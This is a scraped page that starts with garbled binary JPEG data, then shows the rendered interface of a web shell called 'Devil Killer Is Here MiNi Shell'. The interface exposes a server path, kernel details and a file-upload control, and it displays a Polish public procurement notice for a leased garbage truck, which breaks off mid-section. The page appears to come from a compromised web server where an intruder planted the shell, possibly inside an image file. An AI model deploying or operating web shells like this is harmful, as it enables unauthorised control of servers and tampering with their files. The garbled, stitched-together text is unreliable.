JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241030/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241030/0057142801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa fabrycznie nowego samochodu przeznaczonego do zbierania i transportu odpadów komunalnych, finansowanego w formie leasingu operacyjnego z opcją wykupu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej i Mieszkaniowej w Jarosławiu Sp. z o.o.</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">PGKiM w Jarosławiu Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 650228435</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Przemyska nr 15</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jarosław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">16-621-25-60</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">16-621-52-97</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@pgkimjaroslaw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://pgkimjaroslaw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa fabrycznie nowego samochodu przeznaczonego do zbierania i transportu odpadów komunalnych, finansowanego w formie leasingu operacyjnego z opcją wykupu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d7ca1877-acdf-454e-80d1-bac53da7c56a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00571428</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-d7ca1877-acdf-454e-80d1-bac53da7c56a <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej prowadzonego postępowania : https://ezamowienia.gov.pl/ Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia<br/>(przycisk „Przeglądaj postępowania/konkursy”).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>9. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje<br/>zamieszczone w zakładce „Centrum Pomocy”.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa<br/>Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym , mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie<br/>ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W<br/>zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane<br/>dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>15. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta<br/>„Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do<br/>komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>16. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie<br/>postępowania w zakładce „Komunikacja”.<br/>17. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 25 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>18. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>19. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą<br/>skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej<br/>https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>20. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>biuro@pgkimjaroslaw.pl .<br/>(nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Oświadczenie o wypełnieniu obowiązku informacyjnego przewidzianego w art. 13 lub art.<br/>14 rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) wobec osób fizycznych, od których<br/>dane osobowe bezpośrednio lub pośrednio pozyskałem w celu ubiegania się o udzielenie zamówienia publicznego w niniejszym<br/>postępowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PGKiM-DAP 26.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest dostawa fabrycznie nowego samochodu przeznaczonego do zbierania i transportu odpadów komunalnych, z tylnym załadunkiem odpadów na podwoziu trzyosiowym (wyprodukowanego nie wcześniej niż w 2024r.) finansowanego w formie leasingu operacyjnego z opcją wykupu. <br/>3)	Wymagane parametry techniczne i cechy konstrukcyjne:<br/><br/><br/>PODWOZIE:<br/><br/>1)	Typ podwozia: trzyosiowe w konfiguracji osi 6x2 z osią wleczoną<br/>2)	Oś wleczona elektrohydraulicznie skrętna<br/>3)	Rozstaw osi max 3750 mm<br/>4)	Dopuszczalna masa całkowita min. 26 000 kg,<br/>5)	Minimalna nośność techniczna przedniego zawieszenia min. 8000 kg,<br/>6)	Minimalna nośność techniczna zawieszenia tylnego wózka min. 21 000 kg,<br/>7)	Minimalna nośność techniczna osi napędowej min 12 500 kg<br/>8)	Minimalna nośność techniczna osi wleczonej min 8000 kg<br/>9)	Stabilizator przedniej osi	<br/>10)	Stabilizator dodatkowy osi tylnej/ wleczonej<br/>11)	Zawieszenie przednie – resory paraboliczne, <br/>12)	Zawieszenie tylne – pneumatyczne<br/>13)	Silnik o mocy min. 235 kW i max. momencie obrotowym min. 1600 Nm<br/>14)	Norma emisji spalin Euro 6 z systemem selektywnej redukcji katalitycznej SCR,<br/>15)	Pojemność skokowa silnika od 9000 cm3 do 11000 cm3<br/>16)	Skrzynia biegów zautomatyzowana lub automatyczna,<br/>17)	Przystawka odbioru mocy odsilnikowa, niezależna od sprzęgła – moment obrotowy dostępny w czasie jazdy i postoju,<br/>18)	Światła do jazdy dziennej LED,<br/>19)	Reflektory przednie ze światłami w technologii LED<br/>20)	Automatyczne światła mijania <br/>21)	Kabina trzy miejscowa (dzienna) o szerokości zewnętrznej min 2400 mm<br/>22)	Trzy niezależne miejsca do siedzenia w kabinie<br/>23)	Kolor kabiny biały<br/>24)	Osłona przeciwsłoneczna zewnętrzna <br/>25)	Szyba przednia przyciemniona <br/>26)	Zawieszenie kabiny pneumatyczne,<br/>27)	Gumowe dywaniki podłogowe,<br/>28)	Koło kierownicy po lewej stronie z możliwością regulacji położenia,<br/>29)	Podgrzewane i elektrycznie regulowane lusterka wsteczne prawe i lewe oraz podgrzewane lusterka rampowe (przednie) i krawężnikowe<br/>30)	Elektrycznie sterowane podnośniki szyb drzwi kierowcy i pasażera,<br/>31)	Szyby przednia przyciemniona<br/>32)	Czujnik deszczu<br/>33)	Systemy ABS, EBS, ESP lub równoważne<br/>34)	Hamulec przystankowy tj. funkcja zatrzymania pojazdu Auto-hold lub równoważna współpracująca z automatycznym załączaniem położenia neutralnego skrzyni biegów <br/>35)	Elektroniczny hamulec postojowy<br/>36)	Tempomat<br/>37)	Immobilizer fabryczny,<br/>38)	Centralny zamek z pilotem<br/>39)	Klimatyzacja<br/>40)	Alternator 24V, min. 100 A<br/>41)	Podgrzewany filtr paliwa,<br/>42)	2 akumulatory min. 180 Ah,<br/>43)	Tachograf cyfrowy z legalizacją i kalibracją po zarejestrowaniu pojazdu,<br/>44)	Układ wydechowy spalin skierowany do góry ponad zabudowę lub wydech dolny,<br/>45)	Hamulce tarczowe osi przedniej i tylnej,<br/>46)	Obręcze stalowe z oponami w rozmiarze 315/80 R22.5 dostosowane nośnością do max technicznej nośności osi podwozia.<br/>47)	Bieżnik opon szosowo- terenowy o podwyższonej wytrzymałości<br/>48)	Zbiornik paliwa min 310 litrów aluminiowy,<br/>49)	Zbiornik AdBlue min 45 l,<br/>50)	Blokada mechanizmu różnicowego tylnego mostu,<br/>51)	Trójkąt ostrzegawczy, gaśnica, kpl. kluczy z podnośnikiem min 10 ton,<br/>52)	Gniazdo w kabinie 12V i 24V oraz gniazdo USB<br/>53)	Min dwa kliny zabezpieczające pojazd przed przemieszczaniem na terenie pochyłym,<br/>54)	Przedni zaczep holowniczy,<br/>55)	Wyświetlacz z komputerem pokładowym w języku polskim<br/>56)	Boczne osłony anty-rowerowe fabryczne <br/>57)	Apteczka,<br/>58)	Wyjście adaptacyjne do podłączenia urządzenia GPS<br/>59)	Koło zapasowe oś przednia (dołączone luzem),<br/>60)	Przewód do pompowania kół,<br/>61)	Kratki ochronne na reflektorach, metalowe<br/>62)	Złącze pneumatyczne w kabinie kierowcy wraz z pistoletem z elastycznym przewodem<br/>63)	Schowek na dokumenty formatu A4	<br/>64)	Uchwyt na butelki<br/>65)	Gwarancja podwozia 24 miesiące<br/>66)	Belka świetlna LED na kabinie z napisem „PGKiM ZOM JAROSŁAW”. Ostateczny napis do ustalenia z Zamawiającym w drodze uzgodnień na etapie wykonania dostawy<br/>67)	CB-RADIO<br/><br/>ZABUDOWA<br/><br/>1.	Nowa zabudowa skrzyniowa z urządzeniem załadowczym tylnym przeznaczona do zbierania odpadów komunalnych, surowców wtórnych. Pojemności skrzyni ładunkowej min. 23 m3. Rok produkcji skompletowanego 2024<br/>2.	Wszystkie elementy składowe zabudowy malowane przed montażem. Malowanie podkładem, a następnie lakierowane na kolor biały odpowiadający kolorem kabiny podwozia <br/>3.	Całkowicie uszczelniony jednoczęściowy, integralny korpus skrzyni z odwłokiem ze zgniotem min. 5:1<br/>4.	Boki skrzyni ładunkowej wykonane z blachy konstrukcyjnej lub trudnościeralnej o grubości min. 4 mm.<br/>5.	Dno skrzyni ładunkowej wykonane z wysokogatunkowej blachy konstrukcyjnej o podwyższonej odporności na ścierania lub trudnościeralnej o grubości min. 6 mm.<br/>6.	Wanna załadowcza wykonana z blachy wysokogatunkowej trudnościeralnej o grubości dna min. 10 mm typu Hardox 450 lub równoważnej. Boki wanny o grubości min. 6 mm również z blachy wysokogatunkowej trudnościeralnej Hardox 450 lub równoważnej.<br/>7.	Uszczelka między płytą wypychającą a ścianami bocznymi skrzyni na całej długości połączenia, nakładana jest na całą wysokość w celu zapewnienia maksymalnej szczelności podczas zbierania odpadów tzw. frakcji mokrych.<br/>8.	Dolne zaczepy skrzyni ryglujące odwłok regulowane mimośrodowo z możliwością regulacji szczeliny między skrzynią a odwłokiem zwiększające szczelność w trakcie eksploatacji<br/>9.	Skrzynia ładunkowa o przekroju owalnym, <br/>10.	Podłoga skrzyni zaokrąglona z otworem rewizyjnym z możliwością odprowadzenia odcieków<br/>11.	Podwyższenie ściany przedniej zabudowy do 800 mm<br/>12.	Ściany zabudowy płaskie wykonane z jednego arkusza blachy<br/>13.	Mechanizm zgniatania liniowo – płytowy (szufladowy).<br/>14.	Możliwość sterowania mechanizmem załadowczym w cyklu automatycznym, ciągłym oraz manualnym. <br/>15.	Prowadnice łopaty wypychającej wewnątrz zabudowy – po bokach.<br/>16.	Urządzenie zasypowe obsługujące pojemniki o pojemności od 120 l do 1100 l zgodnie z normą MGB EN/PN 840 -1,- 2,- 3 <br/>17.	Urządzenie zasypowe montowane wykonane w konstrukcji stalowej zabezpieczone antykorozyjnie <br/>18.	Urządzenie zasypowe posiadające funkcję automatycznego pobierania i unoszenia pojemników i kontenerów na listwie grzebieniowej tzw. pick-up, funkcja automatycznego unoszenia pojemników rozłączalna przyciskiem na panelu sterowania z tyłu zabudowy.<br/>19.	Automatyczne unoszenie urządzenia zasypowego do pozycji do jazdy w trakcie załączenia biegów do przodu lub biegu wstecznego.<br/>20.	Ześlizg składany – burta odwłoka w konstrukcji stalowej, zabezpieczone antykorozyjnie<br/>21.	Wysokość od podłoża do stałej krawędzi wrzutnika max. 1450 mm.<br/>22.	Dwa stopnie dla ładowaczy z czujnikiem zajętości i opuszczenia stopnia oraz poręcze po bokach zabudowy zgodne z normą EN-PN 1501-01 08:2021<br/><br/>5)	Podstawowe warunki leasingu operacyjnego <br/><br/>Umowa leasingu operacyjnego może zostać zawarta na standardowym wzorze umowy stosowanej przez Wykonawcę z zastrzeżeniem następujących postanowień: <br/>1)	Okres leasingu: 60 miesięcy. <br/>2)	Opłata inicjalna – wstępna w wysokości 10% wartości przedmiotu leasingu netto płatna przed zawarciem umowy na podstawie danych do przelewu określonych przez Wykonawcę <br/>3)	Wartość końcowa wykupu przedmiotu leasingu przez Zamawiającego w wysokości 1% wartości przedmiotu leasingu netto pod warunkiem spłacenia przez Zamawiającego wszelkich należności wynikających z umowy leasingu.<br/>4) Opłata manipulacyjna – 0% <br/>5) Liczba rat leasingowych: 59 <br/>6) Oprocentowanie leasingu będzie zmienne w całym okresie leasingu oparte na stopie procentowej rynku międzybankowego WIBOR 1M. Stawkę WIBOR 1M obowiązującą w dniu 05.11.2024r. należy przyjąć w celu wyliczenia ceny oferty i dla umożliwienia Zamawiającemu porównywalności ofert, natomiast umowa leasingu zostanie podpisana przez Zamawiającego w oparciu o aktualną stawkę WIBOR 1M obowiązującą w dniu jej podpisania </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34114000-9 - Pojazdy specjalne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34144510-6 - Pojazdy do transportu odpadów</p> <p class="mb-0">34144511-3 - Pojazdy do zbierania odpadów</p> <p class="mb-0">66114000-2 - Usługi leasingu finansowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku muszą ustanowić pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego<br/>2. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać:<br/>1) wskazanie postępowania o zamówienie publiczne, którego dotyczy,<br/>2) Wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>3) ustanowionego pełnomocnika oraz<br/>4) zakres jego umocowania, a także<br/>5) oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia.<br/>3. Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza,<br/>Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę<br/>tych Wykonawców.<br/>4. Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady<br/>określone w niniejszym Rozdziale. Spółka cywilna ubiegająca się o zamówienie musi wyznaczyć pełnomocnika do jej<br/>reprezentowania. Ustawowe zasady reprezentacji spółki cywilnej zezwalające każdemu wspólnikowi na jej reprezentowanie<br/>w takich granicach, w jakich jest uprawniony do prowadzenia jej spraw, nie spełniają bowiem wymogu z art. 58 ust. 2 ustawy<br/>PZP. W przypadku spółki cywilnej art. 58 ust. 2 ustawy PZP nie będzie miał zastosowania, jeżeli oferta zostanie podpisana<br/>kwalifikowanym podpisem elektronicznym podpisem zaufanym lub podpisem osobistym przez wszystkich wspólników spółki<br/>cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - 